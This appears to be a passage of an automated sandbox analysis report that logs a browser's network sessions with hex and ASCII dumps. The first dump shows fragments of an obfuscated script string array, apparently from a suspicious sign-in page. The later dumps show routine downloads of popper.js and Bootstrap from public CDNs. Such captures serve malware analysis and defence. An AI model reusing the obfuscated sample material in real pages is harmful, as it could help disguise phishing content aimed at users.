                                                                                                                  Data Ascii: ','\x201\x20}\x20.orde','33333%\x20}\x20.','[href]:hov','-popover-t','on:\x20row-re','.table\x20the','CcebY','tiple]),\x20.','#loader','Color\x20Emoj','left:\x20auto','vertical>.','%,\x200,\x200);\x20','([size]):n','s-popover-','ottom:\x200\x20!','-box-pa
                                                                                                                  2024-10-22 14:08:36 UTC8184INData Raw: 32 30 61 2e 74 65 78 74 2d 73 27 2c 27 6e 64 5c 78 32 30 7b 5c 78 32 30 2d 77 65 62 6b 27 2c 27 3a 5c 78 32 30 23 31 37 31 61 31 64 5c 78 32 30 27 2c 27 3d 5c 78 32 32 62 6f 78 5c 78 32 32 5c 78 32 30 69 64 3d 27 2c 27 69 63 61 6c 3e 2e 62 74 6e 3a 27 2c 27 2d 78 6c 2d 31 5c 78 32 30 7b 5c 78 32 30 2d 77 27 2c 27 73 68 6f 77 3e 2e 6e 61 76 2d 27 2c 27 6c 28 5c 78 32 32 64 61 74 61 3a 69 6d 27 2c 27 73 5c 78 32 30 7b 5c 78 32 30 63 6f 6c 6f 72 3a 27 2c 27 2d 65 78 70 61 6e 64 2d 78 6c 27 2c 27 74 68 3a 5c 78 32 30 31 30 30 25 3b 5c 78 32 30 27 2c 27 65 6c 70 3b 5c 78 32 30 62 6f 72 64 65 27 2c 27 5c 78 32 30 7d 5c 78 32 30 2e 63 6c 6f 73 65 3a 27 2c 27 3b 5c 78 32 30 74 65 78 74 2d 73 68 61 27 2c 27 23 65 39 65 63 65 66 3b 5c 78 32 30 6f 27 2c 27 3a 5c 78
                                                                                                                  Data Ascii: 20a.text-s','nd\x20{\x20-webk',':\x20#171a1d\x20','=\x22box\x22\x20id=','ical>.btn:','-xl-1\x20{\x20-w','show>.nav-','l(\x22data:im','s\x20{\x20color:','-expand-xl','th:\x20100%;\x20','elp;\x20borde','\x20}\x20.close:',';\x20text-sha','#e9ecef;\x20o',':\x
                                                                                                                  2024-10-22 14:08:36 UTC8184INData Raw: 2e 39 5c 78 32 30 7d 5c 78 32 30 2e 27 2c 27 67 69 6e 3a 5c 78 32 30 2e 35 72 65 6d 27 2c 27 6c 74 69 70 5c 78 32 30 7b 5c 78 32 30 70 6f 73 27 2c 27 6c 74 69 70 2c 5c 78 32 30 2e 77 61 73 27 2c 27 3d 63 68 65 63 6b 62 6f 78 5d 27 2c 27 7b 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 27 2c 27 6e 61 34 65 4c 6a 35 4f 58 6d 27 2c 27 6b 69 64 61 4d 27 2c 27 74 69 70 5c 78 32 30 7b 5c 78 32 30 64 69 73 70 27 2c 27 2c 5c 78 32 30 36 33 70 78 29 5c 78 32 30 72 6f 27 2c 27 2e 37 35 72 65 6d 5c 78 32 30 31 2e 32 27 2c 27 7d 5c 78 32 30 5b 74 79 70 65 3d 62 75 27 2c 27 6f 72 73 5c 78 32 30 7b 5c 78 32 30 70 6f 73 69 27 2c 27 74 65 6e 74 3a 5c 78 32 30 73 70 61 63 27 2c 27 75 73 74 6f 6d 2d 72 61 64 69 27 2c 27 2e 33 72 65 6d 5c 78 32 30 2d 5c 78 32 30 31 70 27 2c 27 65 3a
                                                                                                                  Data Ascii: .9\x20}\x20.','gin:\x20.5rem','ltip\x20{\x20pos','ltip,\x20.was','=checkbox]','{\x20margin-l','na4eLj5OXm','kidaM','tip\x20{\x20disp',',\x2063px)\x20ro','.75rem\x201.2','}\x20[type=bu','ors\x20{\x20posi','tent:\x20spac','ustom-radi','.3rem\x20-\x201p','e:
                                                                                                                  2024-10-22 14:08:36 UTC8184INData Raw: 70 75 74 2e 69 73 2d 69 27 2c 27 5b 74 79 70 65 3d 6d 6f 6e 74 27 2c 27 74 2d 69 6e 6c 69 6e 65 2d 69 27 2c 27 61 73 5c 78 32 30 66 61 2d 61 72 72 6f 27 2c 27 74 74 6f 6d 3a 5c 78 32 30 2e 32 35 72 27 2c 27 5c 78 32 30 6f 72 64 65 72 3a 5c 78 32 30 31 31 27 2c 27 65 66 74 2d 72 61 64 69 75 73 27 2c 27 36 77 52 34 33 4e 36 6b 39 54 27 2c 27 2d 67 72 6f 75 70 2d 70 72 65 27 2c 27 6e 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 27 2c 27 37 68 32 32 4d 34 5c 78 32 30 31 35 68 27 2c 27 55 41 41 41 41 42 41 41 41 41 27 2c 27 62 6f 78 2d 70 61 63 6b 3a 5c 78 32 30 27 2c 27 69 70 73 69 73 3b 5c 78 32 30 77 68 69 27 2c 27 6f 72 65 2c 5c 78 32 30 2e 62 73 2d 74 27 2c 27 74 68 3a 5c 78 32 30 39 31 2e 36 36 36 27 2c 27 5c 78 32 32 64 69 73 70 6c 61 79 3a 5c 78 32 30 27 2c 27
                                                                                                                  Data Ascii: put.is-i','[type=mont','t-inline-i','as\x20fa-arro','ttom:\x20.25r','\x20order:\x2011','eft-radius','6wR43N6k9T','-group-pre','n:\x20normal;','7h22M4\x2015h','UAAAABAAAA','box-pack:\x20','ipsis;\x20whi','ore,\x20.bs-t','th:\x2091.666','\x22display:\x20','
                                                                                                                  2024-10-22 14:08:36 UTC8184INData Raw: 32 30 30 3b 5c 78 32 30 7a 2d 69 6e 64 65 27 2c 27 74 3b 5c 78 32 30 74 72 61 6e 73 69 74 27 2c 27 2d 64 69 61 6c 6f 67 5c 78 32 30 7b 5c 78 32 30 27 2c 27 74 69 76 65 5c 78 32 30 7b 5c 78 32 30 63 6f 6c 27 2c 27 64 69 73 70 6c 61 79 3a 5c 78 32 30 66 27 2c 27 6e 67 3a 5c 78 32 30 2e 32 35 72 65 6d 27 2c 27 3a 66 6f 63 75 73 2c 5c 78 32 30 2e 73 27 2c 27 43 41 73 4d 43 77 6f 4d 43 51 27 2c 27 68 69 74 65 3b 5c 78 32 30 7d 5c 78 32 30 7d 5c 78 32 30 27 2c 27 6e 67 3a 5c 78 32 30 30 3b 5c 78 32 30 6f 76 65 27 2c 27 2e 61 72 72 6f 77 2c 5c 78 32 30 2e 62 27 2c 27 70 3a 5c 78 32 30 31 2e 35 72 65 6d 5c 78 32 30 27 2c 27 69 6f 6e 3a 5c 78 32 30 74 72 61 6e 73 27 2c 27 75 6e 64 2d 63 6f 6c 6f 72 3a 27 2c 27 6c 67 2d 35 5c 78 32 30 7b 5c 78 32 30 70 61 64 27 2c
                                                                                                                  Data Ascii: 200;\x20z-inde','t;\x20transit','-dialog\x20{\x20','tive\x20{\x20col','display:\x20f','ng:\x20.25rem',':focus,\x20.s','CAsMCwoMCQ','hite;\x20}\x20}\x20','ng:\x200;\x20ove','.arrow,\x20.b','p:\x201.5rem\x20','ion:\x20trans','und-color:','lg-5\x20{\x20pad',
                                                                                                                  2024-10-22 14:08:36 UTC8184INData Raw: 3b 5c 78 32 30 27 2c 27 6d 3a 6c 61 73 74 2d 63 68 69 27 2c 27 66 69 72 73 74 5c 78 32 30 7b 5c 78 32 30 2d 77 27 2c 27 2e 35 72 65 6d 3b 5c 78 32 30 70 61 64 27 2c 27 73 65 63 6f 6e 64 61 72 79 3a 27 2c 27 67 3a 6e 6f 74 28 3a 64 69 73 27 2c 27 75 69 64 5c 78 32 30 7b 5c 78 32 30 70 61 64 64 27 2c 27 6d 61 72 67 69 6e 2d 62 6f 74 27 2c 27 5c 78 32 30 7d 5c 78 32 30 2e 64 72 6f 70 6c 65 27 2c 27 3b 5c 78 32 30 6d 61 72 67 69 6e 2d 74 27 2c 27 62 74 6e 3a 66 6f 63 75 73 2c 27 2c 27 65 66 74 3a 5c 78 32 30 37 35 25 5c 78 32 30 7d 27 2c 27 3d 5c 78 32 32 76 69 65 77 70 6f 72 74 27 2c 27 5c 78 32 30 73 69 67 6e 5c 78 32 30 69 6e 5c 78 32 30 72 27 2c 27 6e 2d 73 65 6c 66 3a 5c 78 32 30 61 75 27 2c 27 76 62 61 72 2d 74 6f 67 67 6c 27 2c 27 23 63 6f 64 65 27 2c
                                                                                                                  Data Ascii: ;\x20','m:last-chi','first\x20{\x20-w','.5rem;\x20pad','secondary:','g:not(:dis','uid\x20{\x20padd','margin-bot','\x20}\x20.drople',';\x20margin-t','btn:focus,','eft:\x2075%\x20}','=\x22viewport','\x20sign\x20in\x20r','n-self:\x20au','vbar-toggl','#code',


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  33192.168.2.1649761104.17.25.144432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:36 UTC388OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                                                                                  Host: cdnjs.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:36 UTC961INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:36 GMT
                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Cache-Control: public, max-age=30672000
                                                                                                                  ETag: W/"5eb03fa9-4af4"
                                                                                                                  Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                                                  cf-cdnjs-via: cfworker/kv
                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                  Timing-Allow-Origin: *
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  CF-Cache-Status: HIT
                                                                                                                  Age: 49556
                                                                                                                  Expires: Sun, 12 Oct 2025 14:08:36 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dC%2FjIywutsDsuSJI8WilfCICjcmy3nl69Ty9Wx2Q95tog3CuRP2Bu5yLjuuG4TKYMhQOb8VZDny%2F4LPSgopvbW%2FVsBZaW%2F5cwdBAsEvqpNnr3ByL%2Fh8DiHCxk7fDEifDU5KgUoKP"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=15780000
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f71ada72cb6-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:36 UTC408INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                                                                  Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63 75 6d 65 6e
                                                                                                                  Data Ascii: ==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#documen
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 29 7b 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65 5b 27 62 6f 72
                                                                                                                  Data Ascii: ){var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e['bor
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 6f 70 3a 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62 7d 72 65 74 75
                                                                                                                  Data Ascii: op:p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}retu
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 77
                                                                                                                  Data Ascii: ight:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t=e.w
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 6c 65 2e 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d 7b 69 6e 73 74
                                                                                                                  Data Ascii: le.warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e={inst
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 7b 70 61 73
                                                                                                                  Data Ascii: his.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,{pas
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 74 75 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65
                                                                                                                  Data Ascii: turn o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K(e){re
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 74 75 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 55 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66 75 6e 63 74 69 6f
                                                                                                                  Data Ascii: turn''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}functio
                                                                                                                  2024-10-22 14:08:36 UTC1369INData Raw: 74 75 72 6e 20 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6f 2c 65 7d 2c 73 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b
                                                                                                                  Data Ascii: turn o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=arguments[


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  34192.168.2.1649762104.18.11.2074432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:36 UTC385OUTGET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1
                                                                                                                  Host: stackpath.bootstrapcdn.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:36 UTC965INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:36 GMT
                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  CDN-PullZone: 252412
                                                                                                                  CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                  CDN-RequestCountryCode: US
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Cache-Control: public, max-age=31919000
                                                                                                                  ETag: W/"67176c242e1bdc20603c878dee836df3"
                                                                                                                  Last-Modified: Mon, 25 Jan 2021 22:04:06 GMT
                                                                                                                  CDN-ProxyVer: 1.04
                                                                                                                  CDN-RequestPullSuccess: True
                                                                                                                  CDN-RequestPullCode: 200
                                                                                                                  CDN-CachedAt: 10/04/2024 02:53:43
                                                                                                                  CDN-EdgeStorageId: 1029
                                                                                                                  timing-allow-origin: *
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  CDN-Status: 200
                                                                                                                  CDN-RequestTime: 0
                                                                                                                  CDN-RequestId: e91c2640b4ae056de948031f7176693c
                                                                                                                  CDN-Cache: HIT
                                                                                                                  CF-Cache-Status: HIT
                                                                                                                  Age: 55724
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f7369f5ddab-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
